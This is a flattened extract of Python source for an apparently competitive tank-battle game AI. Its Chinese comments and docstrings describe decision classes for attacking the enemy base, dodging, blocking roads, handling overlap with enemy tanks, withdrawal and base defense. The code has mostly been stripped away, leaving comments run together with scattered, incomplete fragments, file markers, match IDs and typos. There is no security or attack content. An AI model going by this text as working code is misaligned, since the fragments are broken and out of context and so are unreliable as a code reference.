用于判断决策对象返回的结果是否标志着该决策适用于当前情况,用于被外部判断 规定当该决策对象不能 handle 时,返回 __class__.UNHANDLED_RESULT 那么只需要判断实际返回值是否与之相等,即可判断该情况是否被 handle 真正用于被派生类重载的抽象决策接口 如果该情况不适用,那么不需要写任何返回值,函数默认返回 None make_decision 函数将以此来判断该情况是否被 handle 外部可调用的决策接口 ---------------------- 会对 _make_decision 的结果进行一些统一的处理,也可以用于在决策前后进行一些预处理和后处理操作 此处提供一个默认的情况的处理方法: ---------------------------------- - 如果真正的决策函数返回了一个 action ,则将其作为最终结果直接返回 - 如果当前情况不适用,真正的决策函数返回了 None ,则返回 UNHANDLED_RESULT 单人决策者的抽象基类,用于 Tank2Player 的个人决策 重写的构造函数,确保与 Tank2Player._make_decision 接口的参数列表一致 Input: - player Tank2Player 单人玩家实例 - signal int 团队信号 用于处理团队信号的决策模型 注意: ------------ # 将会处理到的团队信号 通常来说,如果团队发送了一个信号,必须及时返回一个结果 只有在 signal is None 的情况下,才返回 UNHANDLED_RESULT # 团队信号必须得到响应 团队决策的抽象基类,用于 Tank2Team 的双人决策 TeamDecision 与 SingleDecision 不一样,它不存在最优的决策者, 而是所有决策者都会尝试进行一次决策。决策存在高低优先级,高优先级的决策者 如果对某个 player 的行为进行了协调,那么低优先级的决策者不应该覆盖高优先级 决策者的现有决策结果(当然极其特殊的决策者例外)。 如果使用 DecisionChain 进行多个团队决策者的连续决策, 那么整个决策链上的所有决策者必定都会进行一次决策。 # Tank2Team 为了适应 DecisionChain 的决策,这里重写 is_handled 函数 使得无论如何都可以让 DecisionChain 继续 派生类重写的 _make_decision 要求返回值必须是 [int, int] 重写 makd_decision 接口 确保在决策完成后 player1, player2 的决策结果与返回结果同步 这主要考虑到在决策的时候可能会忘记 create_snapshot ... #{ END 'decision/abstract.py' }# #{ BEGIN 'decision/chain.py' }# 决策链 ------------- 效仿责任链模式,对多个决策实例进行组合,按优先级顺序依次进行决策 如果遇到一个符合条件的决策,则将其决策结果返回,否则继续尝试低优先级的决策 # 确保所有的 decision 实例均为 DecisionMaker 的派生 #{ END 'decision/chain.py' }# #{ BEGIN 'decision/single/leave_teammate.py' }# 处理两人重叠的情况 -------------------- 1. 尝试采用安全的移动行为离开队友 2. 避免和队友采用相同的移动方向 3. 尽量往不导致进攻路线增加的方向移动 # 存在风险 # 不能与队友的移动方向相同! # 没有合理的离开行为 ... # action -> deltaLength # 必定有路? # 移动后进攻路线短变短者值小 #{ END 'decision/single/leave_teammate.py' }# #{ BEGIN 'decision/single/attack_base.py' }# 特殊情况决策,当下一步就要拆掉敌方基地时 # TODO: # 可能需要考虑一种特殊情况: 队友被杀,自己下一步打掉对方基地,但是对方下一步把我干掉 # 这种情况下,即使我方拆掉对方基地也算平局。也许可以考虑先闪避一回合,然后再继续拆家。 # # 特殊状态 # 必定是射击 ... #{ END 'decision/single/attack_base.py' }# #{ BEGIN 'decision/single/encount_enemy.py' }# 遭遇敌人时的决策 # 两个敌人,尝试逃跑 # 可能会遇到极其罕见的三人重叠 # 首先判断是否为真正的双人夹击 # 先判断敌人是否重叠,如果是,那么很有可能直接击杀! # 队友还没有死,自己可以考虑牺牲 # 实际可视为一个人 # 真正的被夹击 # 如果两者都有弹药,可能要凉了 ... # TODO: 这种情况下有选择吗? # 随便打一个? # 均不能进攻的话,优先闪避到下回合没有敌人的位置(优先考虑拆家方向) # 如果是移动行为 # 一个可行的闪避方向 # 均不能闪避,应该是处在狭道内,则尝试任意攻击一个 # TODO: 是否有选择? # 随便打一个 # 有一个能射击,则反击他 # 找到能射击的敌人 # 不能闪避 # 要凉了 ... # 统一判断 # 没有办法?尝试反击 # 要凉了 # 没有办法对付 .. # 无所谓的办法了... # TODO: # 虽然说遇到了两个一条线上的敌人,但是这不意味着后一个敌人就没有威胁 5ccee460a51e681f0e8e5b17 # 当前情况: # --------- # 1. 敌人数量为 2 但是一个处在另一个身后,或者重叠,可视为一架 # 2. 敌人数量为 1 # # len(aroundEnemies) == 2: # # (inserted) 判断上回合敌人是否和我重叠,用于标记敌人 5ce52a48d2337e01c7a714c7 # # 且不是因为我方主动打破重叠导致 # 上回合刚刚进入重叠,这回合就被打破 # # 在非 WITHDRAW 的情况下,评估当前侵略性 # # 侵略模式/僵持模式 #---------- # 1. 优先拆家 # 2. 只在必要的时刻还击 # 3. 闪避距离不宜远离拆家路线 # # 如果能直接打死,那当然是不能放弃的!! # 必死 # 其他情况,优先进攻,不与其纠缠 # 默认的进攻路线 # 存在风险 # # 原本移动或射击,因为安全风险而变成停留,这种情况可以尝试射击,充分利用回合数 # # TODO: # 实际上,很多时候最佳路线选择从中线进攻,但从两侧进攻也是等距离的, # 在这种情况下,由于采用从中线的进攻路线,基地两侧的块并不落在线路上,因此会被 # 忽略,本回合会被浪费。但是进攻基地两侧的块往往可以减短路线。因此此处值得进行 # 特殊判断 # # 为 block 对象,该回合可以射击 # TODO: 此时开始判断是否为基地外墙,如果是,则射击 # 刚刚对射为两回合,该回合双方都没有炮弹,尝试打破僵局 #--------------------------------------------------- # 当前为侵略性的,并且在对方地盘,尝试回退一步,与对方重叠。 # 后退操作必须要有限制 5cd10315a51e681f0e900fa8 # # 如果一直回头,尝试在这一步选择非回头的其他行为 5ced8eee641dd10fdcc7907f # # 还需要检查两者上上回合是否为等待 # 避免将边移动边对射的情况考虑进来 # 添加必须在对方地盘的限制,避免在我方地盘放人 # 只有侵略性的状态可以打破僵局 # 判断是否为反复回头 # 最近几回合内是否曾经回头过 # 严格不在我方基地 # 考虑用闪避的方式代替后退 # 删掉这个状态 # 否则继续回头 # 上回合正在和对方对射 # 但是我方本回合不能射击 # 并且对方本回合不能射击 # 保持对射状态,用于后方打破僵持 # 其余情况照常 # 否则不予理会,直接移动或者反击 # 补丁 #---------------------------- # 针对两者距离为 2 的情况,不能一概而论! # # 僵持模式考虑堵路 # 必定能找到路! # 更适合堵路 # 其他情况均可以正常移动 #player.set_status(Status.KEEP_ON_MARCHING) #return action # 直接抛出让后面的 decision 处理,当做没有这个敌人 # 不能移动,只好反击 # 对方有炮弹,需要分情况 5ccb3ce1a51e681f0e8b4de1 #----------------------------- # 1. 如果是侵略性的,则优先闪避,并且要尽量往和进攻路线方向一致的方向闪避,否则反击 # 2. 如果是僵持的,那么优先堵路,类似于 Defensive # # TODO: # 可能需要团队信号协调 5ccc30f7a51e681f0e8c1668 # # # 首先把堵路的思路先做了,如果不能射击,那么同 aggressive # # TODO: # 有的时候这并不是堵路,而是在拖时间! 5ccf84eca51e681f0e8ede59 # 上一回合保持重叠,但是却被敌人先过了,这种时候不宜僵持,应该直接走人 # 这种情况下直接转为侵略模式! # # 直接过到侵略模式 # 否则算作正常的防守 # # TODO: # 射击不一定正确,因为敌人可能上回合刚把我过掉,此时应该考虑主动闪走! # 5ce4e66cd2337e01c7a6abd7 # # # (inserted) 先看上回合是不是刚被对方过掉 # # 刚刚被对手打破重叠 # 刚刚被对手主动打破重叠 # 对方现在位于我的攻击路线上,说明对方上回合是 # 回头堵路,那么继续保持射击 # 正常防御 # 保持对射 # 否则视为进攻逻辑 # 闪避,尝试找最佳方案 #------------------------- # 限制条件,只有在对方基地才开始闪现! # # 最佳方向是闪避向着进攻方向移动 # # 与进攻方向相同的方向是最好的 # 风险评估 # 闪避加行军 # 没有最佳的闪避方案,仍然尝试闪避 #----------------------------- # 但是不能向着增加攻击线路长短的方向闪避! # # 不能超过当前路线长度,否则就是浪费一回合 # # 此时还可以考虑借力 # 假设下回合两方对射,如果我方尝试闪避,对方会恰好打掉我方进攻路线上的块,那么就闪避 # # 存在可用的闪避行为 # 限制为只有在对方基地才适用这个逻辑 # 假设闪走 # 对手会打掉墙 # 这个块在某一个最短的攻击路线上 # # 没有不能不导致路线变长的办法,如果有炮弹,那么优先射击! # 5ccef443a51e681f0e8e64d8 #----------------------------------- # (inserted) 刚刚对射为两回合,该回合尝试闪避敌人,打破僵局 #-------------------------------------------- # 尝试往远处闪避,创造机会 # # 此外,由于敌人这回合必定射击,那么他的炮弹可能会打掉我身后的墙 # 这样的可能会创造一些新的机会。有的时候导致该回合必须要与敌人对射的原因,可能是因为 # 没有办法开辟攻击路线,而不是敌人堵路。由于闪避的方向是不允许的,也就是另一个更近的 # 闪避反向上必定是一个无法摧毁也不能移动到的块,否则会被与先摧毁。 # 此时如果可以往背离敌人的方向移动,那么应该不会陷入对射僵局。但事实上是进入了 # 这就说明别离敌人的方向是无法移动到的。如果它恰好是一块土墙,那么就可以靠这回合和敌人接力 # 来摧毁掉,也许还有往下移动的可能。 5ce429fad2337e01c7a5cd61 # # 检查对应的两个冷却回合是停止 # 避免将移动对射的情况被考虑进来 # 添加必须在对方地盘的限制,避免在我方地盘放人 # 只有侵略性的状态可以打破僵局 # 这里还是再判断一下距离 # 默认是优先射击 # 如果不能射击,那么终究还是要闪避的 # 或者是无法后方移动,为了打破僵局,尝试闪避 #---------------------------------- # # 因为这种情况很有可能会出现死循环 5cd009e0a51e681f0e8f3ffb # 为了后续能够打破这种情况,这里额外添加一个状态进行标记 # # # 其实还有一种情况,那就是危险的敌人在自己身上! 5ceaaacdd2337e01c7adf6a4 # # 这种情况下实际是没有威胁的 ... # TODO: # 还需要判断是否向远路闪避 ... # 这里的细节还需要优化,或者这个和自己重叠的条件在前面就要穿插进去 # 否则就凉了 ... # 防御模式 #---------- # 1. 如果对方下回合必死,那么射击 # 2. 优先堵路,距离远则尝试逼近 # 3. 必要的时候对抗 # 4. 距离远仍然优先 # # elif status == DEFENSIVE_STATUS: # attackAction = self.try_make_decision(battler.get_next_attacking_action()) # 默认的侵略行为 # 必死情况 # # 不能马上打死,敌人又无法攻击 #------------------------------- # 优先堵路,根据双方距离判断 # # 必定能找到路! # 双方相邻,选择等待 # 此处首先延续一下对射状态 # 上回合正在和对方对射 # 但是我方本回合不能射击 # 并且对方本回合不能射击 # 保持对射状态,用于后方打破僵持 # 和对方相隔两个格子以上 # 可以安全逼近 # 可以认为在堵路 ... # 否则只好等额爱 # _route.length == 2: # 相距一个格子,可以前进也可以等待,均有风险 #---------------------------------------- # 1. 如果对方当前回合无法闪避,下一回合最多只能接近我 # - 如果对方下回合可以闪避,那么我现在等待是意义不大的,不如直接冲上去和他重叠 # - 如果对方下回合仍然不可以闪避,那么我就选择等待,反正它也走不了 # 2. 如果对方当前回合可以闪避,那么默认冲上去和他重叠 # - 如果我方可以射击,那么对方应该会判定为闪避,向两旁走,那么我方就是在和他逼近 # - 如果我方不能射击,对方可能会选择继续进攻,如果对方上前和我重叠,就可以拖延时间 # # TODO: # 好吧,这里的想法似乎都不是很好 ... # 能不防御就不防御,真理 ... # if len( oppBattler.try_dodge(battler) ) == 0: # 对手当前回合不可闪避,当然我方现在也不能射击。现在假设他下一步移向我 action = oppBattler.move_to(battler) # 对方移向我 if map_.is_valid_move_action(oppBattler, action): map_.simulate_one_action(oppBattler, action) # 提交模拟 if len( oppBattler.try_dodge(battler) ) == 0: # 下回合仍然不可以闪避,说明可以堵路 map_.revert() player.set_status(Status.READY_TO_BLOCK_ROAD) return Action.STAY map_.revert() # 否则直接冲上去 if player.is_safe_to_close_to_this_enemy(oppBattler): # 可以安全移动 moveAction = battler.move_to(oppBattler) player.set_status(Status.READY_TO_BLOCK_ROAD) # 可以认为在堵路 return moveAction else: # 冲上去不安全,那就只能等到了 player.set_status(Status.READY_TO_BLOCK_ROAD) return Action.STAY else: # 对手当前回合可以闪避,那么尝试冲上去和他重叠 # TODO: # 可能弄巧成拙 5cca97a4a51e681f0e8ad227 # # 这个问题需要再根据情况具体判断! # ''' if player.is_safe_to_close_to_this_enemy(oppBattler): # 可以安全重叠 moveAction = battler.move_to(oppBattler) player.set_status(Status.READY_TO_BLOCK_ROAD) return moveAction else: # 有风险,考虑等待 player.set_status(Status.READY_TO_BLOCK_ROAD) return Action.STAY ''' # # TODO: # 是否应该根据战场情况进行判断,比如停下来堵路对方一定无法走通? # # 假设自己为钢墙然后搜索对方路径? # player.set_status(Status.READY_TO_BLOCK_ROAD) return Action.STAY # 似乎没有比这个这个更好的策略 ... # 对方可以射击 # 优先反击 # 触发对射状态 # 不能反击,只好闪避 # 凉了 ... # len(actions) == 2: # 统一判断 # 否则就凉了 ... # # 回撤模式 #------------ # 1. 优先回撤 # 2. 如果处在守卫状况,根据所处位置,选择反击或堵路 # # 安全行为 # 留给 withdraw 处理 # 现在我方坦克已经处在基地附近 # 符合 base defense 的条件 # 安全行为 # 留给 base defense # # 否则就是不安全行为,应该予以反击 # # 否则应该闪避 # 不然就凉了 ... # 最后就等待 #{ END 'decision/single/encount_enemy.py' }# #{ BEGIN 'decision/single/overlapping.py' }# 与敌人重合时的决策 ------------------------ 侵略模式 -------- 1. 直奔对方基地,有机会就甩掉敌人 防御模式 -------- 1. 尝试回退堵路 2. 对于有标记的敌人,考虑采用其他的策略,例如尝试击杀敌军 多回合僵持后,会有主动打破重叠的决策 # 看作是防御 # # 先检查对方上回合是否在跟随我移动,以及时切换决策模式 ... # 5cd3f56d86d50d05a0083621 / 5ccec5a6a51e681f0e8e46c2 / 5ce26520d2337e01c7a3ca2b #------------------------------- # 如果和一个带有跟随重叠标记的敌人僵持超过 3 回合,就把这个标记移除,因为它此时已经不是一个会和我马上打破重叠的敌人了 # 5ce3c990d2337e01c7a54b4c # TODO: 是否有必要判断射击方向相同? # 如果和一个带有跟随重叠标记的敌人在同一回合采用射击的方式打破重叠,则对这个行为进一步标记 # # (inserted) 如果敌人带有立即打破重叠的标记,那么如果还能执行到这个地方,就意味着敌人 # 上次打破重叠的方向是回防(如果是进攻,那么应该不会再有机会遭遇) # # 那么在此处重新进入重叠的时候,尝试将对手击杀 # # 防御模式不触发? # 上回合不重叠 # # (inserted) 观察到大多数人在遇到重叠时会选择直接无视对手,我们也可以学习一下这种决策 # 但是目前不想让这个决策成为必须,希望它只在特定的状况下被触发。 # # 对于非防御模式下,考虑这样三种情况: # ------------------------------------- # 1. 假设我方当前进攻路线距离领先一步 ,如果对方主动打破重叠,这时,如果对方下一步可以闪避, # 而我方当前回合不饿能闪避,必须要还击(之所以必须要射击是因为我们考虑最坏的情况,假设 # 对方这回合会还击,如果我方这时候不还击就会被打掉),假如对方这回合闪避了,并且恰好沿着进攻 # 方向闪避,那么结束后对方将比我方领先一步,这时候即使再继续攻击,结局也很可能是输, # 因此这步可以考虑主动打破重叠 # # 2. 假设我方当前进攻路线长度与敌方相同,假设对方主动打破重叠,假设对方可以闪避并且可以向着 # 进攻方向闪避,那么对方很有可能比我方快一步,此时应该主动打破重叠。假如对方不能向着进攻方向 # 闪避,那么认为敌人一定会还击,此时考虑我方下回合是否可以向着进攻方向闪避,如果不可以的话, # 我方就和对方差一步,处于劣势,那么就主动打破重叠。 # # 3. 假设对方比我方领先一步,这种情况下多属于对方处在我方阵营,我方很可能会触发防御模式 # 这种情况下就直接忽略掉吧 # # 虽然应该不可能,但是还是判断一下 # 我方领先步数 # TODO: # 是否有必要考虑射击行为? # 情况一 # # 由于不同的路线下一步可能会走到相同的地方,而造成的结果相同 # 因此此处将相同的行为进行缓存,为了减少判断次数 # 只考虑移动行为,因为,假如对方当前回合射击,那么我方下回合可以移动 # 这时双方距离可以认为相等,很有可能平局 # 提交地图模拟这步行为,这个时候双方应该均为僵持 # 考虑下回合我方是否可以闪避 # 确保这种情况下决策不会再运行到这里,因为此时将不再和敌人重叠,于是不会遇到递归无终点 # 说明下回合我方可以闪避,那么就可以不管了 # 我方下回合不可以闪避,考虑敌人下回合是否可以闪避 # 说明下回合敌人可以闪避 # 情况二 # TODO: # 仍然不考虑射击?为了防止无迭代终点? # 提交一步模拟,敌方应该比我方领先一步 # 考虑下回合敌方是否可以闪避 # 敌方可以闪避 # 对方下回合不可以闪避,那么考虑我方是否可以闪避 # TODO: # 我方下回合可能是防御状态,这种情况下必定反击,判断不准确 # # 不过问题其实不大,因为这样就会触发主动打破重叠 # # 我方不能闪避 # 其他情况,留作下一回合打破重叠 # # 假设下一步射击,考虑最糟糕的一种情况,那就是敌人同一回合主动打破重叠,移动到我方身后 # 而我方无法闪避,那么就有被敌人击杀的风险 # # 无法闪避! # 在没有被击杀风险的情况下可以采用射击 # 是否已经有多回合僵持,应该主动打破重叠 # 可以射击 # 上回合重叠这回合还重叠,就视为僵持,趁早打破重叠 # 对方不能射击,对自己没有风险,或者是符合了主动打破重叠的条件 # 尝试继续行军 # # 首先先处理主动打破重叠的情况的情况 # 该情况下会改用定制的安全性测试函数判断情况 # # TODO: # 优先尝试不往上回合已经移动过的方向移动 5ce26520d2337e01c7a3ca2b # # # 如果遇到和我打破重叠时机一致的对手 #------------------- # 1. 尝试换一个方向移动 # 2. 如果不能换方向,那么可能在狭道内,那么退回原来的位置, # 这意味着如果敌人下回合开炮,那么他必死 5ce264c2d2337e01c7a3c9f6 # # # 禁止的行为不一定是反向!因为可能恰好遇到拐弯 ... # 5ce48707d2337e01c7a641b7 / 5ce487a6d2337e01c7a64205 # # 有可能上回合是等待,也就是 # 上回合又下方决策得到,因此需要一直回查到移动行为 # 反向移动的行为 # # 尝试移向其他的方向 # # TODO: # 太难判断了,还是暂时先禁止把 ... 鬼知道对面怎么算的距离 # if realAction == forbiddenAction: route1 = battler.get_shortest_attacking_route() for optionalAction in battler.get_all_valid_move_actions(): if (optionalAction == forbiddenAction or optionalAction == revertMoveAction # 不要回头 ): continue with map_.simulate_one_action(battler, optionalAction): route2 = battler.get_shortest_attacking_route() if route2.length <= route1.length: # 移动后不增加攻击距离s realAction = optionalAction break # # 尝试反向移动 # # TODO: # 事实上反向移动也不一定是正确的,因为每一个人对于这种情况的判断是不一样的 # 5ce4943ed2337e01c7a64cdd # if realAction == forbiddenAction: with map_.simulate_one_action(battler, revertMoveAction): if len(oppBattler.try_dodge(battler)) == 0: # 如果这回合他反向射击,那么必死 realAction = revertMoveAction # # 否则等待,让敌人开一炮,这样下回合还会继续触发移动 # 有可能换一个敌方就可以有别的决策方法 # 也有可能直接带到基地 5ce48b77d2337e01c7a644e5 # # 保持等待状况 # 无法安全移动,但是又需要打破重叠,那么就视为防御 # 让后续的代码进行处理 # 这里会漏到 DEFENSIVE # 开始处理常规情况 # 继续起那就 # 否则就是等待了,打得更有侵略性一点,可以尝试向同方向开炮! # 下一步预计射击 # 否则停留 # 原地等待 # 对方不能射击,对自己没有风险,或者是符合了主动打破重叠的条件 # # 这里不只思考默认的最优路径,而是将所有可能的最优路径都列举出来 # 因为默认的最优路径有可能是破墙,在这种情况下我方坦克就不会打破重叠 # 这就有可能错失防御机会 # # 模拟对方的侵略性算法 # 大概率是移动 # 主要是为了确定方向 # 首先先检查对方是否会跟随我 #-------------------------- # 1. 如果我方可以射击,对方不能射击,那么按照之前的经验,对方下回合会移动 # 这个时候尝试击杀 # # 这回合可以射击,则改为射击 # 如果带有这个标记,那么这回合就不要射击了,等待敌人打完这回合, # 下回合才有可能击杀 5ce50cd9d2337e01c7a6e45a # 否则就考虑反身射击 # 尝试击杀敌军 # 均不能射击,那么将判定为没有风险。那就一起移动 # 正常情况下选择堵路 #---------------------- # 模仿敌人的移动方向 # 认为在堵路 # 否则等待 #{ END 'decision/single/overlapping.py' }# #{ BEGIN 'decision/single/base_defense.py' }# 主动防守基地 --------------------- 现在没有和敌人正面相遇,首先先处理一种特殊情况 在敌人就要攻击我方基地的情况下,应该优先移动,而非预判击杀 这种防御性可能会带有自杀性质 若敌人当前回合正面对我方基地 ---------------------------- 1. 敌人当前回合炮弹冷却,下回合射向我方基地,如果我方坦克下一步可以拦截,那么优先移动拦截 2. 敌人当前回合可以射击,我方坦克下一步可以拦截,那么自杀性拦截 3. 敌人当前回合炮弹冷却,下回合射向我方基地,而我方坦克需要两步才能拦截,那么自杀性拦截 若敌人下一回合可以面对我方基地 ---------------------------- 1. 此时敌人必定可以射击,如果我方坦克在这一步可以优先移动到拦截的位置,那么优先移动 # # 敌人当前回合面向基地 # # 敌方可以射击 # 此时不再面向我方基地,为正确路线 # 敌方不可射击 # 敌方不能射击,我方尝试移动两步 # 一步防御成功 # 尝试两步拦截 # 需要先预判是否合理 # 两步拦截成功 # # 敌人下一回合可能面向基地 # # 敌人移动一步后面向我方基地 # 我方优先移动可以阻止 #{ END 'decision/single/base_defense.py' }# #{ BEGIN 'decision/single/behind_brick.py' }# 适用于在墙后和敌人僵持时的情况 # 准备破墙信号 #-------------------------- # 触发条件: # # 1. 对应于双方对峙,我方开好后路后触发某些条件强制破墙 # 2. 对方刚刚从墙后移开,我方存在后路,这个时候强制破墙 # # 收到这个信号的时候,首先检查是否可以闪避 # # 1. 如果可以闪避,就返回可以破墙的信号 # 2. 如果不可以闪避,就返回这回合准备后路的信号 # # 只考虑攻击路径上的敌人 _undoRevertTurns = 0 while oppTank is None: # 对应于敌方刚离开的那种触发条件 # 可能存在多轮回滚,因为别人的策略和我们的不一样! # 给别人回滚的时候必须要考虑多回合! map_.revert() _undoRevertTurns += 1 oppTank = battler.get_enemy_behind_brick(attackAction, interval=-1) # # 墙后敌人并不一定处于攻击路径之后! 5ce3d1c0d2337e01c7a554e3 # 在这种情况下应该取消考虑这种情况 # # 用于下回合触发 # 用于下回合触发 # 重新设置这个敌人! # 准备凿墙 # 两边均不是土墙 # 不能处理,只好等待 # 可以闪避,那么回复团队一条消息,下一步是破墙动作 for _ in range(_undoRevertTurns): map_.undo_revert() # 必定回复一个信号 # # 准备回退以制造二打一的局面 # # 只考虑攻击路径上的敌人 # ?? # 存在风险,也就是想要夹击的敌人有炮弹,那么就先等待一回合 # 必定回复一个信号 #{ END 'decision/single/behind_brick.py' }# #{ BEGIN 'decision/single/follow_enemy_behind_brick.py' }# 跟随墙后敌人的逻辑 ----------------- 如果上回合敌人和我方隔墙僵持,然后敌人向两侧移动,为了防止敌人从旁边的墙突破, 这里添加一个主动跟随的逻辑,假如对方这回合破墙,那么我方这回合就会出现在对方墙后, 这样对方就无法进攻,甚至可以为我方进攻创造机会 5ce57677d2337e01c7a7c1ff # 上回合墙后有人 # 找到墙后敌人 # 理论上不会存在? # 敌人上回合从墙后闪开 # 尝试跟随敌人上回合的移动行为 # 确保跟随后还隔着墙 5ce90a90d2337e01c7abcd07 # 否则何必要跟随 ... # # 将动作连续化,如果对方连续移动,那么可以考虑跟随 # # 有可能要多回合回滚 # 理论上一定会找到敌人 # 上回合一定跟随移动 # 确保敌人在贴着墙移动,否则就不必继续跟随了 # 两次移动方向或相反 # 尝试跟随敌人上回合行为 #{ END 'decision/single/follow_enemy_behind_brick.py' }# #{ BEGIN 'decision/single/withdrawal.py' }# 主动回撤逻辑 ------------- 如果我方大逆风,那么主动回防基地 具有一个持久性的记忆标签 KEEP_ON_WITHDRAWING 带有这个标签的 player 在决策的时候,比 WithdrawalDecision 优先级高的决策应该以 WITHDRAW 状态为优先 带有 WITHDRAW 持久标记的 player 决策必定会在此处终止,否则就要取消这个标记和状态, 让后续的决策继续进行 # 一个测试用的 const,设为 False 则取消一切和 WITHDRAW 相关的决策 获得基地两个对角线位置的两个防御坐标 更加危险的防御点,被认为是距离敌人更近的防御点 # 距离敌人更近的点根据危险性 为了防止出现这样一种情况: 5ce9154fd2337e01c7abd81f 以及这样一种情况: 5cea5d38d2337e01c7ad8418 ---------------------------------- 1. 假如我方这回合移动,而敌人下回合通过非射击行为,可以面向我方基地(射击行为的话,下回合对方炮弹冷却, 对基地暂时不造成威胁),如果我方这回合选择不移动可以阻止它,那么就选择停止 2. 假如我方这回合射击,而敌人下回合通过非射击行为,可以面向我方基地,那么就选择停止 3. 假如我方先破一墙,对方出现在后面,那么就算是有威胁 # 事实上应该不会出现 # 先保存所有可能行为,为了防止模拟我方行为后,射击能力被重置 # 我方执行一步后,对方面对基地 # 现在不模拟我方行为,然后同样模拟对方行为,看对方是否面对我方基地 # 敌人上回合没有面对我方基地 # 当敌人尚未面对我方基地 # 我方射击一步后,敌人面对我方基地 # 不安全的 # 其他情况均认为安全 Withdraw 下的 try_make_decision # 如果等待了两回合,对方两回合均为射击那么视为安全 # 糟糕的设计!如果后续需要更改,那么需要在再删掉这个状态 获得趋近守卫点 (x2, y2) 的下一个行为 # 这个必定能找到路! # 其实是可以确保一直停留在基地附近的? # stay/realAction # # 首先,检查带有持久化 WITHDRAW 标签的 player # 该回合是否还需要真正的延续这个标签 # # 一种情况是考虑是否应该 # # 实际评估不是 WITHDRAW # 假如对方上回合被击杀,那么我方大概率会触发侵略模式? # 留给其他 decision 处理 # # 一种情况是考虑上回合是否击杀了一个人 # # 二打一的局势,此时 oppBattler 为剩下一个敌人 # 我比队友距离更远 # 一样远 # 我比队友理基地更远,那么让队友防御 # 如果还是一样远 ... # 避免两者同时强攻,那么就让先判断的队友进行强攻 # 留给其他 decision 处理 # 这个状态一旦出现,就添加标记 # # (inserted) 不要轻易从中线撤退,应该想一下是否可以堵路 # # y = [2, 6] # 先判断 stay # 不需要判断安全性? # # 1. 如果上回合已经到达基地附近,那么优先移动到基地对角线的位置等待 # 2. 必要时改变守卫的位置 # # TODO: # 如果能直接到达守卫点,那应该考虑一下直接到达 ... 而不要先把基地的墙凿了 # # # 已到达基地附近,但是未到达守卫点,尝试移向守卫点 # # 为处在对角线防御位置 # 高优先级触发 # # 已经到达守卫点,判断是否需要移向另一个守卫点 # # 距离敌人更近的点根据危险性 # 设置为等待 # 其他情况下继续等待 # 如果不将我视为钢墙 # 如果将我视为钢墙 # TODO: # 如果 route2 和 route3 距离差很大,那么可以选择不动 # # 对方找不到进攻路线,那就相当于我方把路堵住了? # 这个不可能的吧 # 我方防御路线比地方进攻路线领先值 # 至少要快一步 # 阻塞程度最小的优先 # 到达基地就等待了 # 尽量找一条不是停留的路? # 没有一个合适的行为? # 那就随便来一个把 ... # stay # 存在风险敌人就能判定是因为敌人阻挡? #{ END 'decision/single/withdrawal.py' }# #{ BEGIN 'decision/single/active_defense.py' }# 主动防御策略 ----------------------- 不要追击敌人,而是选择保守堵路策略! 1. 对于路线差为 2 的情况,选择堵路,而非重叠 2. 如果自己正常行军将会射击,那么判断射击所摧毁的块是否为敌人进攻路线上的块 如果是,则改为移动或者停止 # 前两回合结束前不要触发主动防御! # 从路线距离分析确定最近敌人 # 避免过早进入 DEFENSIVE 状态 #---------------------------- # 取消主动防御轮数限制? # 前期以侵略性为主 # 如果是距离为 2 #---------------- # 由于两者相对的情况在前面的 encount enemy 时会被处理,这里如果遇到这种情况 # 那么说明两者是出于不相对的对角线位置。 # # 必定能找到路! # # 此时应该考虑自己是否正处在敌方的进攻的必经之路上 # 如果是这样,那么考虑不动,这样最保守 # 否则在合适的回合冲上去挡路 # # 判定方法是将己方坦克分别视为空白和钢墙,看对方的最短路线长度是否有明显延长 # 如果有,那么就堵路 # # 需要能够正确应对这一局的情况 5cd356e5a51e681f0e921453 # TODO: # 事实上这一局敌方不管往左还是往右,都是8步,因此这里会判定为不堵路,所以就会主动重叠 # 但是,左右两边的走法是不一样的,往左走必定会走不通,左右的8步并不等价,这里需要还需要 # 进一步的分析路线的可走性 # # TODO: # 事实上这样不一定准确,因为如果敌人前面有一个土墙,那么他可以先打掉土墙 # 然后继续前移,这样敌方就可以选择继续往前移动 # # 路线增长,说明是必经之路 # # 虽然路线长度相同,但是路线的可走性不一定相同,这里先衡量对方当前路线的可走性 # 如果本回合我方等待,敌人向前移动,那么敌方只有在能够不向原来位置闪避的情况下 # 才算是我堵不住他的路,否则仍然视为堵路成功 5cd356e5a51e681f0e921453 # # 保存原始坐标 # ssert Action.is_move(enemyMoveAction) # 应该是移动 # 此时敌方与我相邻 # 这种情况才是真正的设为 True 否则不属于此处应当考虑的情况 # 如果敌人移动后可以不向着原来的位置闪避 # 此时相当于不能堵路 # # 否则自己不处在敌方的必经之路上,考虑主动堵路 # # 对方这回合不能射击 # 或者对方等待了两个回合,视为没有危险 # 不宜只考虑一回合,否则可能会出现这种预判错误的情况 5cdd894dd2337e01c79e9bed # 移动后我方坦克位于敌方坦克进攻路线上 # 我方的移动后仍然不会挡敌人的路?? # 中路优先 # 如果移动后与敌人相邻 # 否则,就是和敌人接近的连个方向上均为不可走的! # 那么让后续的逻辑进行处理 if ( # 可能是主动防御但是为了防止重叠而等待 ( player.has_status_in_previous_turns(Status.ACTIVE_DEFENSIVE, turns=1) and player.has_status_in_previous_turns(Status.READY_TO_BLOCK_ROAD, turns=1) and Action.is_stay(player.get_previous_action(back=1)) ) or # 可能是为了防止被杀而停止 ( player.has_status_in_previous_turns(Status.PREVENT_BEING_KILLED) and Action.is_stay(player.get_previous_action(back=1)) ) ): oppPlayer = Tank2Player(oppBattler) if Action.is_stay(oppPlayer.get_previous_action(back=1)): # 对方上回合在等待 # # 但是遇到这种情况就非常尴尬 5cd356e5a51e681f0e921453 # # 需要再判断一下是否有必要上前堵路 # _shouldMove = False x1, y1 = oppBattler.xy x2, y2 = _route[1].xy # 目标位置 enemyAttackRoute = oppBattler.get_shortest_attacking_route() if (x2, y2) in enemyAttackRoute: # 下一步移动为进攻路线 enemyMoveAction = Action.get_move_action(x1, y1, x2, y2) with map_.simulate_one_action(oppBattler, enemyMoveAction): for enemyDodgeAction in oppBattler.try_dodge(battler): # 如果敌人上前后可以闪避我 route1 = oppBattler.get_shortest_attacking_route() with map_.simulate_one_action(oppBattler, enemyDodgeAction): route2 = oppBattler.get_shortest_attacking_route() if route2.length <= route1.length: # 并且闪避的路线不是原路返回 _shouldMove = True break # # 真正的值得堵路的情况 # if _shouldMove: x1, y1 = battler.xy x2, y2 = _route[1].xy # 跳过开头 moveAction = Action.get_move_action(x1, y1, x2, y2) if map_.is_valid_move_action(battler, moveAction): # 稍微检查一下,应该本来是不会有错的 player.set_status(Status.ACTIVE_DEFENSIVE) 